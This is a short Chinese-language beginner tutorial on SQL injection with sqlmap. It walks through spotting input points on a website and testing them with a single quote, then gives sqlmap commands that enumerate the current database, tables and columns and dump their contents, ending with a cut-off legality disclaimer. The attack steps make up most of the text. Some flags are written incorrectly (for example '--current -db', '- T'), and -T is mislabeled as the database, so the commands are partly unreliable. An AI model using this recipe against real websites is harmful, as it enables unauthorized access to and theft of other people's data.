初学：运用工具进行SQL注入

基础

常见数据库语言：

database -- db --数据库

table -- T -- 数据表

column -- C -- 数据列

初学：使用工具进行SQL注入

工具：sqlmap.py

步骤

1.找交互点

2.验证注入点

3.挖数据库名称

4.挖数据表名称

5.挖数据列名称

6.挖取目标数据

1.找交互点

在网站中寻找能与数据库进行交互的功能点 -- 找到能把请求传到数据库的地方

常见交互点：

1.具有GET请求的URL 如网址中 ，？关键词=值

2.登录框

3.搜索框

2.验证注入点

验证能否进行SQL注入

采用最简单的恶意语句尝试传输 在最后加上‘

查看页面跳转--数据库会报错--无法正常查询数据--页面会异常显示 报错 空白

3.挖数据库名称

python sqlmap.py -u “网址” --current -db

-u ---指定具有注入点的URL

-- current -db ---挖出当前网站的数据库名称

4.挖数据表名称

python sqlmap.py -u “网址” -D 刚刚挖出的数据库名称 -- tables

-D ---要攻击的数据库名称

--tables --- 挖出数据库中所有的数据表名称

5.挖数据列名称

python sqlmap.py -u “网址” -D 刚刚挖出的数据库名称 - T 要攻击的数据库名称 --columns

-T --- 要攻击的数据库名称

--columns --- 挖出当前数据表下的所有列的名称

6.挖数据

python sqlmap.py -u “网址” -D 刚刚挖出的数据库名称 - T 要攻击的数据库名称 -C 要攻击的列表名

--dump

-C --要攻击的列名 如果多列，可以用英语逗号隔开

--dump ---读取当下的数据

最后即可得到数据

注意：以上操作要在合法范围内，不得随意攻击，篡改他人网站，以